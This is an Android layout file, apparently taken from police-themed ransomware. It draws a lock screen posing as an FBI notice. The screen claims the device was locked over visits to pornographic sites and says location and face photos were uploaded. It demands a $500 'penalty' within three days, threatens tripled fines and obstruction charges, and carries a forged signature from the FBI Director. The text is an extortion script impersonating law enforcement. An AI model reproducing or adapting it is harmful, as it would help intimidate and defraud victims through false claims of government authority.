<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:gravity="fill_horizontal" android:orientation="vertical" android:id="@+id/page1" android:background="#ffffffff" android:visibility="gone" android:layout_width="match_parent" android:layout_height="wrap_content" android:layout_alignParentLeft="true" android:layout_centerVertical="true">
    <LinearLayout android:orientation="vertical" android:layout_width="match_parent" android:layout_height="match_parent" android:layout_weight="1">
        <TextView android:textSize="@dimen/a18sp" android:textStyle="bold" android:textColor="#ffec4536" android:gravity="center_horizontal" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="DEPARTMENT OF JUSTICE" android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a18sp" android:textStyle="bold" android:textColor="#ff034b7b" android:gravity="center_horizontal" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="FEDERAL BUREAU OF INVESTIGATION" android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a16sp" android:textStyle="bold" android:textColor="#ff034b7b" android:gravity="center_horizontal" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="FBI HEADQUARTERS" android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textStyle="bold" android:textColor="#ff000000" android:gravity="center_horizontal" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="WASHINGTON DC DEPARTMENT, USA" android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:paddingBottom="@dimen/a8dp" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="As a result of full scanning of your Device, some suspicious files have been found and your attendance of the forbidden pornographic sites has been fixed. For this reason your Device has been locked." android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:paddingBottom="@dimen/a8dp" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="Information on your location and snapshots containing your face have been uploaded on the FBI Cyber Crime Department&apos;s Datacenter." android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:paddingBottom="@dimen/a8dp" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="First of all, familiarise with the positions stated in section «The legal basis of violations». According to these positions your actions bear criminal character, and you are a criminal subject. The penalty as a base measure of punishment on you which you are obliged to pay in a current of three calendar days is imposed." android:textAllCaps="true"/>
        <LinearLayout android:orientation="horizontal" android:layout_width="match_parent" android:layout_height="match_parent">
            <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="The size of the penalty is " android:layout_alignParentLeft="true" android:textAllCaps="true"/>
            <TextView android:textSize="@dimen/a14sp" android:textStyle="bold" android:textColor="#ff000000" android:gravity="left" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="$500.00" android:textAllCaps="true"/>
        </LinearLayout>
        <TextView android:textSize="@dimen/a12sp" android:textStyle="bold" android:textColor="#ff000000" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Attention!" android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:paddingBottom="@dimen/a8dp" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Disconnection or disposal of the Device or your attempts to unlock the Device independently will be apprehended as unapproved actions interfering the execution of the law of the United States of America (read Section 1509 - Obstruction of court orders and Section 1510 - Obstruction of criminal investigations). In this case and in case of penalty non-payment in a current of three calendar days from the date of this Notification, the total amount of penalty will be tripled and the respective fines will be charged to the outstanding penalty. In case of dissent with the indicted prosecution, you have the right to challenge it in court." android:textAllCaps="true"/>
        <TextView android:textSize="@dimen/a12sp" android:textColor="#ff000000" android:gravity="left" android:paddingBottom="@dimen/a8dp" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="To make a penalty payment, go to section «Payment penalties»" android:textAllCaps="true"/>
    </LinearLayout>
    <LinearLayout android:orientation="horizontal" android:id="@+id/buttons_container" android:layout_width="match_parent" android:layout_height="wrap_content">
        <LinearLayout android:orientation="vertical" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_weight="1">
            <ImageView android:id="@+id/icon" android:layout_width="wrap_content" android:layout_height="wrap_content" android:src="@drawable/stamp"/>
        </LinearLayout>
        <LinearLayout android:orientation="vertical" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_weight="1">
            <TextView android:textSize="@dimen/a12sp" android:textColor="#ff535869" android:gravity="right" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="Director James Comey" android:textAllCaps="true"/>
            <TextView android:textSize="@dimen/a12sp" android:textColor="#ff535869" android:gravity="right" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="Federal Bureau of Investigation" android:textAllCaps="true"/>
            <TextView android:textSize="@dimen/a12sp" android:textColor="#ff535869" android:gravity="right" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="935 Pensylvania Avenue, N.W." android:textAllCaps="true"/>
            <TextView android:textSize="@dimen/a12sp" android:textColor="#ff535869" android:gravity="right" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="Washington, DC 20535-0001" android:textAllCaps="true"/>
        </LinearLayout>
    </LinearLayout>
</LinearLayout>
